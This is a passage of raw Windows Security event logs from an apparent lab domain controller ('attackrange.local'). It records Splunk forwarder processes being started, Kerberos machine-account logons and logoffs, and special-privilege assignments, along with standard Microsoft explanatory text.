Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:00:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264272
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1314
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:00:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264271
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1b84
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:00:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264275
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x7E2FF4
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:00:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264274
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x7E2FF4
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 62473
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:00:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264273
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x7E2FF4
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:01:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264277
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1b80
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:01:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264276
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1644
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:01:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264278
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1058
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:01:10 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264279
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x91c
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:01:11 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264280
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Delegation
New Logon:
Security ID: ATTACKRANGE\WIN-HOST-797$
Account Name: WIN-HOST-797$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x7E4A85
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {DC6104D6-8644-C624-5E2A-37E68DB9CAB8}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: 10.0.1.15
Source Port: 53518
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:01:13 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264281
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1240
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:01:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264283
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1584
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:01:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264282
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x13f0
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:01:20 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264285
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Delegation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x7E5DEF
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {91CA8262-9E50-FD4E-69C1-B65F14ACC796}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: fe80::4c41:d752:3570:2ca6
Source Port: 62478
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:01:20 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264284
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x7E5DEF
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:01:21 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264286
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: ATTACKRANGE\WIN-HOST-797$
Account Name: WIN-HOST-797$
Account Domain: ATTACKRANGE
Logon ID: 0x7E4A85
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:01:31 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264287
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x7E5DEF
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:01:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264290
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x7E6B9D
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:01:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264289
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x7E6B9D
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 62487
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:01:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264288
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x7E6B9D
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:02:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264292
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1338
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:02:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264291
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x12dc
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:02:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264293
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1be4
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:02:10 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264294
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
